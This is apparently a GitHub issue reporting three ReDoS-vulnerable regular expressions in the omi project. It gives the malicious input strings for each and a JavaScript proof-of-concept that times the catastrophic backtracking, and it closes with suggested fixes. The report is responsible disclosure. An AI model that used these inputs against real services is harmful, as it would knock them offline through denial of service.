Vulnerable Regular Expressions in omi
yetingli opened this issue · comments
Type of Issue
Potential Regex Denial of Service (ReDoS)
Description
Here are three regular expressions with ReDos vulnerabilities, as shown below.
regex1 = /( +)[^:]+::/
location
The ReDOS vulnerability of the regex is mainly due to the sub-pattern( +)[^:]+
and can be exploited with the following string" " * 5000
It took 44.0 seconds for regex1 to match the malicious stringregex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/
location
The ReDOS vulnerability of the regex is mainly due to the sub-pattern\s+[\s\S]*?\s+
and can be exploited with the following string"OBTW" + " " * 5000
It took 44.6 seconds for regex2 to match the malicious stringregex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/
location1 location2
The ReDOS vulnerability of the regex is mainly due to the sub-pattern[ \t]*(.+?)[ \t]*
and can be exploited with the following string"#" + " " * 5000
It took 51.4 seconds for regex3 to match the malicious string
I prepared a script that showcases the execution times of the vulnerable regexes as follows.
// When attack_str.length=5000 , it took 44.0 seconds
regex1 = /( +)[^:]+::/;
var attack_str = " ";
console.log("regex1: "+regex1)
for (let i = 1; i < 5000; i++) {
attack_str = attack_str + " ";
if (attack_str.length%100==0){
var time = Date.now();
regex1.test(attack_str);
var run_time = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
}
}
//When attack_str.length=5000 , it took 44.6 seconds
regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/;
var attack_str = "OBTW";
console.log("regex2: "+regex2)
for (let i = 1; i < 5000; i++) {
attack_str = attack_str + " ";
if (attack_str.length%100==0){
var time = Date.now();
regex2.test(attack_str);
var run_time = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
}
}
// When attack_str.length=5000 , it took 51.4 seconds
regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/;
var attack_str = "#";
console.log("regex3: "+regex3)
for (let i = 1; i < 5000; i++) {
attack_str = attack_str + " ";
if (attack_str.length%100==0){
var time = Date.now();
regex3.test(attack_str);
var run_time = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + run_time+" ms")
}
}
I am willing to suggest that you limit the input length, modify these regexes or replace these regexes with other codes.